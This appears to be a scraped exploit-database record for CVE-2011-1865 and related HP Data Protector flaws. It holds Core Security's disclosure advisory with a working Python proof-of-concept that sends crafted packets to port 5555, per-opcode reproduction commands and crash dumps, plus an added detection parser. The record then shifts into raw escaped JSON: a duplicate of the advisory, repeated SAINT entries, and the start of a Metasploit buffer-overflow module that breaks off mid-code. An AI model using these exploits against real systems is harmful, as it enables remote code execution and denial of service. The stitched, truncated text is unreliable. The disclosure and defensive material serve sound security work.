ID EDB-ID:17458 Type exploitdb Reporter Core Security Modified 2011-06-29T00:00:00
Description
HP Data Protector 6.20 - Multiple Vulnerabilities. CVE-2011-1865. DoS exploit for the Windows platform
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/
Multiple vulnerabilities in HP Data Protector
1. *Advisory Information*
Title: Multiple vulnerabilities in HP Data Protector
Advisory ID: CORE-2011-0514
Advisory URL:
http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
Date published: 2011-06-29
Date of last update: 2011-06-29
Vendors contacted: HP
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Remote stack overflow [CWE-120], Null pointer dereference
[CWE-476], Improper input validation [CWE-20]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515
3. *Vulnerability Description*
HP Data Protector [1] is automated backup and recovery software for
single-server to enterprise environments. Multiple vulnerabilities have
been found in HP Data Protector that could allow a remote attacker to
execute arbitrary code and lead to denial of service conditions. The
vulnerabilities are triggered by sending a request to port 5555 of a
host running the "data protector inet" service, part of HP Data
Protector. The request has several parameters, including an opcode. By
sending requests with specially crafted parameters, the different bugs
can be triggered.
4. *Vulnerable packages*
. HP OpenView Storage Data Protector v6.20 (running on Windows).
. HP OpenView Storage Data Protector v6.11 (running on Windows).
. HP OpenView Storage Data Protector v6.10 (running on Windows).
. HP OpenView Storage Data Protector v6.00 (running on Windows).
. Previous versions may be affected, but were not tested.
5. *Non-vulnerable packages*
. No fixes are available at the time of publication.
6. *Vendor Information, Solutions and Workarounds*
HP has issued a security bulletin with document ID c02872182 [2]
available through HP Support Center at http://www.hp.com/go/HPSC.
The latest version of HP Data Protector is vulnerable to these issues.
HP has provided the following procedure to mitigate these vulnerabilities:
1. Upgrade to Data Protector A.06.20 or subsequent.
2. Enable encrypted control communication services on cell server and
all clients in cell.
The upgrade is available for download from
http://hp.com/go/dataprotector then under 'Product Information' click on
'Trials and Demos'.
7. *Credits*
These vulnerabilities were discovered by Oren Isacson from Core Security
Technologies. Publication was coordinated by Carlos Sarraute.
8. *Technical Description / Proof of Concept Code*
The following Python script can be used to reproduce the different bugs.
/-----
import struct, socket, sys

# Python 2 script. Usage:
#   poc.py <target> <opcode> <string_length> <args_number> <long_argument>
target = sys.argv[1]
opcode = sys.argv[2]
string_length = int(sys.argv[3])   # length of the oversized argument
args_number = int(sys.argv[4])     # total number of arguments sent
long_argument = int(sys.argv[5])   # index of the argument made oversized

def to_wc(x):
    # Convert an ASCII string to wide (UTF-16-LE) characters
    return ''.join(["%s\x00" % c for c in x])

args = [to_wc('a')] * args_number
args[5] = to_wc(opcode)                 # argument 5 carries the opcode
args[long_argument] = 'a' * string_length
packet = ["\xff\xfe\x32\x00\x00\x00"]   # BOM, wide "2", wide NUL

for s in args:
    # each argument: wide space, the string, wide NUL terminator
    packet.append("\x20\x00" + s + "\x00\x00")

packet = ''.join(packet)
packet = struct.pack(">L", len(packet)) + packet   # 4-byte big-endian length prefix

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 5555))
sock.send(packet)
sock.close()
- -----/
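As an added, defender-side example (not part of Core's advisory or of the PoC above), the following Python 3 code parses requests framed the way the script above frames them and flags the two shapes the advisory describes: an argument far longer than any legitimate value, and a request too short to carry an opcode at argument 5. The framing (4-byte big-endian length, UTF-16-LE byte-order mark, header field "2", then space-separated NUL-terminated wide strings with the opcode at index 5) is read off the PoC, not from vendor documentation; `MAX_ARG_CHARS`, `OPCODE_INDEX`, `build_request`, `parse_request` and `audit_request` are this example's own names and thresholds.

```python
import struct

# Constructed threshold for this example: legitimate inet arguments (paths,
# host names, option strings) are far shorter than the 10000-byte strings the
# advisory's reproduction commands send.
MAX_ARG_CHARS = 1024
# Index of the opcode within the argument list, as used by the advisory's PoC.
OPCODE_INDEX = 5


def build_request(args):
    """Frame a list of str arguments the way the advisory's PoC does:
    4-byte big-endian length, UTF-16-LE BOM, the header field "2",
    then each argument as a wide space, the wide string and a wide NUL."""
    body = b"\xff\xfe" + "2".encode("utf-16-le") + b"\x00\x00"
    for arg in args:
        body += " ".encode("utf-16-le") + arg.encode("utf-16-le") + b"\x00\x00"
    return struct.pack(">L", len(body)) + body


def parse_request(data):
    """Split one framed request into (header, args). Raises ValueError on
    framing errors so a caller can treat malformed input as suspicious."""
    if len(data) < 4:
        raise ValueError("short frame: no length prefix")
    (declared,) = struct.unpack(">L", data[:4])
    body = data[4:]
    if declared != len(body):
        raise ValueError("length prefix %d != body length %d" % (declared, len(body)))
    if not body.startswith(b"\xff\xfe"):
        raise ValueError("missing UTF-16-LE byte-order mark")
    try:
        text = body[2:].decode("utf-16-le")
    except UnicodeDecodeError as exc:
        # An odd-length body (e.g. a raw, non-wide filler string) lands here.
        raise ValueError("body is not valid UTF-16-LE: %s" % exc)
    fields = text.split("\x00")
    if fields[-1] != "":
        raise ValueError("last field is not NUL-terminated")
    header, rest = fields[0], fields[1:-1]
    args = []
    for field in rest:
        if not field.startswith(" "):
            raise ValueError("argument missing leading wide space")
        args.append(field[1:])
    return header, args


def audit_request(data):
    """Return a dict describing one request and the checks it failed.
    'oversized' lists argument indexes above MAX_ARG_CHARS; 'short' is set
    when there is no argument at OPCODE_INDEX at all."""
    try:
        header, args = parse_request(data)
    except ValueError as exc:
        return {"malformed": str(exc), "suspicious": True}
    oversized = [i for i, a in enumerate(args) if len(a) > MAX_ARG_CHARS]
    short = len(args) <= OPCODE_INDEX
    return {
        "header": header,
        "opcode": None if short else args[OPCODE_INDEX],
        "arg_count": len(args),
        "max_arg_chars": max((len(a) for a in args), default=0),
        "oversized": oversized,
        "short": short,
        "suspicious": bool(oversized) or short,
    }


if __name__ == "__main__":
    # Constructed sample: a 30-argument request with opcode "20" and one
    # 2000-character argument, well above the example threshold.
    sample = ["a"] * 30
    sample[OPCODE_INDEX] = "20"
    sample[13] = "a" * 2000
    print(audit_request(build_request(sample)))
    # A request with short arguments and an opcode in place passes.
    print(audit_request(build_request(["a"] * 5 + ["20"] + ["/tmp/x"] * 10)))
```

Run `audit_request` over request bodies captured on TCP port 5555 (one frame at a time); a length-prefix mismatch, an odd-length body or an unterminated field is reported as malformed rather than silently skipped, since those are exactly the inputs a hand-built packet produces and a real client does not.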
In the following sections, we give the command line details to reproduce
each bug, and a brief description of the effect produced.
8.1. *Vulnerability 1. Opcodes 20 and 28.*
[CVE-2011-1865] This vulnerability can be reproduced with any of the
following commands:
"poc.py 127.0.0.1 20 10000 30 13" or "poc.py 127.0.0.1 28 10000 30 6"
This causes a stack overflow.
/-----
007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3
007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52
007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35
61616161 00000000 00000000 00000000 00000000 0x61616161
- -----/
8.2. *Vulnerability 2. Opcode 11.*
[CVE-2011-1865] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 11 10000 30 17"
A stack overflow is produced within the function swprintf, called from
position 0x00411A72.
8.3. *Vulnerability 3. Opcode 35.*
[CVE-2011-1865] This vulnerability can be reproduced with any of the
following commands:
"poc.py 127.0.0.1 35 10000 30 6" or "poc.py 127.0.0.1 35 10000 30 7"
A stack overflow is produced within the function swprintf, called from
position 0x0041367F.
8.4. *Vulnerability 4. Opcode 42.*
[CVE-2011-1865] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 42 10000 30 9"
A stack overflow is produced by calling the function swprintf from
position 0x0040A9BA.
8.5. *Vulnerability 5. Opcode 46.*
[CVE-2011-1865] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 46 10000 30 17"
A stack overflow is produced by calling the function swprintf from
position 0x0040A708.
8.6. *Vulnerability 6. Opcode 27.*
[CVE-2011-1865] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 27 10000 30 3"
A stack overflow is produced by calling the function swprintf from
position 0x0040AD53.
8.7. *Vulnerability 7. Opcode 17.*
[CVE-2011-1865] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 17 10000 30 6"
A stack overflow is produced by calling the function swprintf from
position 0x0040FC05.
8.8. *Vulnerability 8. Opcode 11.*
[CVE-2011-1514] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 11 1 7 6"
This causes a null pointer dereference.
/-----
eax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490 edi=00000000
eip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
omniinet+0x7ed0:
00407ed0 8b10 mov edx,[eax] ds:0023:00000014=????????

007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0
007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e
007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b
007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02
007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c
007cffb4 7c80b713 00156490 00000000 0012e7f8 ADVAPI32!CryptVerifySignatureW+0x29
007cffec 00000000 77df3519 00156490 00000000 kernel32!GetModuleFileNameA+0x1b4
- -----/
8.9. *Vulnerability 9. Opcode 20.*
[CVE-2011-1515] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 20 1 7 6"
The process terminates without generating an exception, resulting in a
denial of service condition.
9. *Report Timeline*
. 2011-06-02:
Core Security Technologies notifies HP Security Alert team of the
vulnerabilities. Publication date is temporarily set to July 5th, 2011.
. 2011-06-06:
Vendor acknowledges receipt.
. 2011-06-06:
Core sends technical details to the vendor.
. 2011-06-06:
Vendor confirms that a new case was assigned within HP Software Security
Response Team (SSRT).
. 2011-06-16:
Core requests an update on this issue, in particular Core asks the
vendor for a technical analysis of the bugs, a list of affected products
and versions, and the vendor's plan for providing a fix (no reply
received).
. 2011-06-23:
Core requests once more an update.
. 2011-06-28:
Vendor communicates that a security bulletin will be issued on the same
day (June 28). The vendor confirms the vulnerabilities, and recommends
as mitigation to enable encrypted communications in the cell server and
client.
. 2011-06-28:
Core requests a link to the vendor's bulletin, and asks whether CVE ids
have been assigned.
. 2011-06-28:
Vendor provides a link to the bulletin and CVE names for the
vulnerabilities.
. 2011-06-29:
Advisory CORE-2011-0514 is published.
10. *References*
[1] HP Data Protector http://hp.com/go/dataprotector
[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,
Remote Execution of Arbitrary Code
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
iEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo
CwCfTapBtDaQT/LBrrVC7K4l8G5hnEo=
=ozGY
-----END PGP SIGNATURE-----
*Vulnerability Information* \n \nClass: Remote stack overflow [CWE-120], Null pointer dereference \n[CWE-476], Improper input validation [CWE-20] \nImpact: Code execution \nRemotely Exploitable: Yes \nLocally Exploitable: No \nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515 \n \n \n3. *Vulnerability Description* \n \nHP Data Protector [1] is an automated backup and recovery software for \nsingle-server to enterprise environments. Multiple vulnerabilities have \nbeen found in HP Data Protector that could allow a remote attacker to \nexecute arbitrary code and lead to denial of service conditions. The \nvulnerabilities are triggered by sending a request to port 5555 of a \nhost running the \"data protector inet\" service, part of HP Data \nProtector. The request has several parameters, including an opcode. By \nsending requests with specially crafted parameters, the different bugs \ncan be triggered. \n \n \n4. *Vulnerable packages* \n \n. HP OpenView Storage Data Protector v6.20 (running on Windows). \n. HP OpenView Storage Data Protector v6.11 (running on Windows). \n. HP OpenView Storage Data Protector v6.10 (running on Windows). \n. HP OpenView Storage Data Protector v6.00 (running on Windows). \n. Previous versions may be affected, but were not tested. \n \n \n5. *Non-vulnerable packages* \n \n. No fixes are available at the time of publication. \n \n \n6. *Vendor Information, Solutions and Workarounds* \n \nHP has issued a security bulletin with document ID c02872182 [2] \navailable through HP Support Center at http://www.hp.com/go/HPSC. \n \nThe latest version of HP Data Protector is vulnerable to these issues. \nHP has provided the following procedure to mitigate these vulnerabilities: \n \n1. Upgrade to Data Protector A.06.20 or subsequent. \n2. Enable encrypted control communication services on cell server and \nall clients in cell. 
\n \nThe upgrade is available for download from \nhttp://hp.com/go/dataprotector then under 'Product Information' click on \n'Trials and Demos'. \n \n \n7. *Credits* \n \nThese vulnerabilities were discovered by Oren Isacson from Core Security \nTechnologies. Publication was coordinated by Carlos Sarraute. \n \n \n8. *Technical Description / Proof of Concept Code* \n \nThe following python script can be used to reproduce the different bugs. \n \n/----- \nimport struct, socket, sys \n \ntarget = sys.argv[1] \nopcode = sys.argv[2] \nstring_lenght = int(sys.argv[3]) \nargs_number = int(sys.argv[4]) \nlong_argument = int(sys.argv[5]) \n \ndef to_wc(x): \nreturn ''.join([\"%s\\x00\" % c for c in x] ) \n \nargs = [to_wc('a')] * args_number \nargs[5] = to_wc(opcode) \nargs[long_argument] = 'a' * string_lenght \npacket = [\"\\xff\\xfe\\x32\\x00\\x00\\x00\"] \n \nfor s in args: \npacket.append(\"\\x20\\x00\" + s + \"\\x00\\x00\") \n \npacket = ''.join(packet) \npacket = struct.pack(\">L\", len(packet)) + packet \n \nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) \nsock.connect((target, 5555)) \nsock.send(packet) \n \n- -----/ \n \n \nIn the following sections, we give the command line details to reproduce \neach bug, and a brief description of the effect produced. \n \n \n8.1. *Vulnerability 1. Opcodes 20 and 28.* \n \n[CVE-2011-1865] This vulnerability can be reproduced with any of the \nfollowing commands: \n\"poc.py 127.0.0.1 20 10000 30 13\" or \"poc.py 127.0.0.1 28 10000 30 6\" \nThis causes a stack overflow. \n \n/----- \n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3 \n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52 \n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35 \n61616161 00000000 00000000 00000000 00000000 0x61616161 \n \n- -----/ \n \n \n \n8.2. *Vulnerability 2. 
Opcode 11.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 11 10000 30 17\" \nA stack overflow is produced within the function swprintf, called from \nposition 0x00411A72. \n \n \n8.3. *Vulnerability 3. Opcode 35.* \n \n[CVE-2011-1865] This vulnerability can be reproduced with any of the \nfollowing commands: \n\"poc.py 127.0.0.1 35 10000 30 6\" or \"poc.py 127.0.0.1 35 10000 30 7\" \nA stack overflow is produced within the function swprintf, called from \nposition 0041367F. \n \n \n8.4. *Vulnerability 4. Opcode 42.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 42 10000 30 9\" \nA stack overflow is produced by calling the function swprintf from \nposition 0x0040A9BA. \n \n \n8.5. *Vulnerability 5. Opcode 46.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 46 10000 30 17\" \nA stack overflow is produced by calling the function swprintf from \nposition 0x0040A708. \n \n \n8.6. *Vulnerability 6. Opcode 27.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 27 10000 30 3\" \nA stack overflow is produced by calling the function swprintf from \nposition 0x0040AD53. \n \n \n8.7. *Vulnerability 7. Opcode 17.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 17 10000 30 6\" \nA stack overflow is produced by calling the function swprintf from \nposition 0x0040FC05. \n \n \n8.8. *Vulnerability 8. Opcode 11.* \n \n[CVE-2011-1514] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 11 1 7 6\" \nThis causes a null pointer dereference. 
\n \n/----- \neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490 \nedi=00000000 \neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac \npe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 \nefl=00010212 \nomniinet+0x7ed0: \n00407ed0 8b10 mov edx,[eax] \nds:0023:00000014=???????? \n \n \n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0 \n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e \n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b \n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02 \n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c \n007cffb4 7c80b713 00156490 00000000 0012e7f8 \nADVAPI32!CryptVerifySignatureW+0x29 \n007cffec 00000000 77df3519 00156490 00000000 \nkernel32!GetModuleFileNameA+0x1b4 \n \n- -----/ \n \n \n8.9. *Vulnerability 9. Opcode 20.* \n \n[CVE-2011-1515] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 20 1 7 6\" \nThe process terminates without generating an exception, resulting in a \ndenial of service condition. \n \n \n9. *Report Timeline* \n \n. 2011-06-02: \nCore Security Technologies notifies HP Security Alert team of the \nvulnerabilities. Publication date is temporarily set to July 5th, 2011. \n \n. 2011-06-06: \nVendor acknowledges receipt. \n \n. 2011-06-06: \nCore sends technical details to the vendor. \n \n. 2011-06-06: \nVendor confirms that a new case was assigned within HP Software Security \nResponse Team (SSRT). \n \n. 2011-06-16: \nCore requests an update on this issue, in particular Core asks the \nvendor for a technical analysis of the bugs, a list of affected products \nand versions, and the vendor's plan for providing a fix (no reply \nreceived). \n \n. 2011-06-23: \nCore requests once more an update. \n \n. 2011-06-28: \nVendor communicates that a security bulletin will be issued on the same \nday (June 28). 
The vendor confirms the vulnerabilities, and recommends \nas mitigation to enable encrypted communications in the cell server and \nclient. \n \n. 2011-06-28: \nCore requests a link to the vendor's bulletin, and asks whether CVE ids \nhave been assigned. \n \n. 2011-06-28: \nVendor provides a link to the bulletin and CVE names for the \nvulnerabilities. \n \n. 2011-06-29: \nAdvisory CORE-2011-0514 is published. \n \n \n10. *References* \n \n[1] HP Data Protector http://hp.com/go/dataprotector \n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector, \nRemote Execution of Arbitrary Code \nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182 \n \n \n11. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://corelabs.coresecurity.com. \n \n \n12. *About Core Security Technologies* \n \nCore Security Technologies enables organizations to get ahead of threats \nwith security test and measurement solutions that continuously identify \nand demonstrate real-world exposures to their most critical assets. Our \ncustomers can gain real visibility into their security standing, real \nvalidation of their security controls, and real metrics to more \neffectively secure their organizations. 
\n \nCore Security's software solutions build on over a decade of trusted \nresearch and leading-edge threat expertise from the company's Security \nConsulting Services, CoreLabs and Engineering groups. Core Security \nTechnologies can be reached at +1 (617) 399-6980 or on the Web at: \nhttp://www.coresecurity.com. \n \n \n13. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2011 Core Security \nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative \nCommons Attribution Non-Commercial Share-Alike 3.0 (United States) \nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n \n \n14. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.9 (MingW32) \n \niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo \nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo= \n=ozGY \n-----END PGP SIGNATURE----- \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102673/CORE-2011-0514.txt"}], "saint": [{"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "description": "Added: 07/18/2011 \nCVE: [CVE-2011-1865](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1865>) \nBID: [48486](<http://www.securityfocus.com/bid/48486>) \nOSVDB: [73571](<http://www.osvdb.org/73571>) \n\n\n### Background\n\nHP Data Protector is a backup solution for enterprise and distributed environments. The Data Protector environment consists of a Cell Manager, backup agents, and backup device servers. The OmniInet process (`**omniinet.exe**`) is responsible for communication between systems in the cell as well as for starting other processes that are used for backup and restore operations. 
\n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an overly long opcode 27 request to the OmniInet process. \n\n### Resolution\n\nUpgrade to Data Protector A.06.20 or newer and enable encrypted control communication services on the cell server and all clients in the cell, as described in HP Security Bulletin [HPSBMU02686 SSRT100541](<http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100> \n\n\n### Limitations\n\nExploit works on HP OpenView Storage Data Protector 6.20. \n\n### Platforms\n\nWindows Server 2003 \nWindows XP \n \n\n", "edition": 1, "modified": "2011-07-18T00:00:00", "published": "2011-07-18T00:00:00", "id": "SAINT:BE1843E272D1C58DB8EE87EEE629BCF9", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_opcode_27", "type": "saint", "title": "HP OpenView Storage Data Protector Opcode 27 Stack Buffer Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "description": "Added: 07/18/2011 \nCVE: [CVE-2011-1865](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1865>) \nBID: [48486](<http://www.securityfocus.com/bid/48486>) \nOSVDB: [73571](<http://www.osvdb.org/73571>) \n\n\n### Background\n\nHP Data Protector is a backup solution for enterprise and distributed environments. The Data Protector environment consists of a Cell Manager, backup agents, and backup device servers. The OmniInet process (`**omniinet.exe**`) is responsible for communication between systems in the cell as well as for starting other processes that are used for backup and restore operations. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an overly long opcode 27 request to the OmniInet process. 
\n\n### Resolution\n\nUpgrade to Data Protector A.06.20 or newer and enable encrypted control communication services on the cell server and all clients in the cell, as described in HP Security Bulletin [HPSBMU02686 SSRT100541](<http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100> \n\n\n### Limitations\n\nExploit works on HP OpenView Storage Data Protector 6.20. \n\n### Platforms\n\nWindows Server 2003 \nWindows XP \n \n\n", "edition": 4, "modified": "2011-07-18T00:00:00", "published": "2011-07-18T00:00:00", "id": "SAINT:C5838FC8C5DFFAC4C8B6A54D44AF1F95", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_opcode_27", "title": "HP OpenView Storage Data Protector Opcode 27 Stack Buffer Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "edition": 2, "description": "Added: 07/18/2011 \nCVE: [CVE-2011-1865](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1865>) \nBID: [48486](<http://www.securityfocus.com/bid/48486>) \nOSVDB: [73571](<http://www.osvdb.org/73571>) \n\n\n### Background\n\nHP Data Protector is a backup solution for enterprise and distributed environments. The Data Protector environment consists of a Cell Manager, backup agents, and backup device servers. The OmniInet process (`**omniinet.exe**`) is responsible for communication between systems in the cell as well as for starting other processes that are used for backup and restore operations. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an overly long opcode 27 request to the OmniInet process. 
\n\n### Resolution\n\nUpgrade to Data Protector A.06.20 or newer and enable encrypted control communication services on the cell server and all clients in the cell, as described in HP Security Bulletin [HPSBMU02686 SSRT100541](<http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100> \n\n\n### Limitations\n\nExploit works on HP OpenView Storage Data Protector 6.20. \n\n### Platforms\n\nWindows Server 2003 \nWindows XP \n \n\n", "modified": "2011-07-18T00:00:00", "published": "2011-07-18T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_opcode_27", "id": "SAINT:58795E132074156A75A962B77A5E7B84", "title": "HP OpenView Storage Data Protector Opcode 27 Stack Buffer Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T07:55:30", "description": "HP OmniInet.exe Opcode 27 Buffer Overflow. CVE-2011-1865. Remote exploit for windows platform", "published": "2011-07-01T00:00:00", "type": "exploitdb", "title": "HP OmniInet.exe - Opcode 27 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-01T00:00:00", "id": "EDB-ID:17467", "href": "https://www.exploit-db.com/exploits/17467/", "sourceData": "##\r\n# $Id: hp_omniinet_3.rb 13081 2011-07-01 22:26:12Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in the Hewlett-Packard\r\n\t\t\t\tOmniInet NT Service. By sending a specially crafted opcode 27 packet,\r\n\t\t\t\ta remote attacker may be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 13081 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-1865' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 800,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t#POP/POP/RET from OmniBack\\bin\\MSVCR71.dll\r\n\t\t\t\t\t\t\t'Ret' => 0x7c35630d\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jun 29 2011'))\r\n\r\n\t\tregister_options([Opt::RPORT(5555)], self.class)\r\n\tend\r\n\r\n\tdef 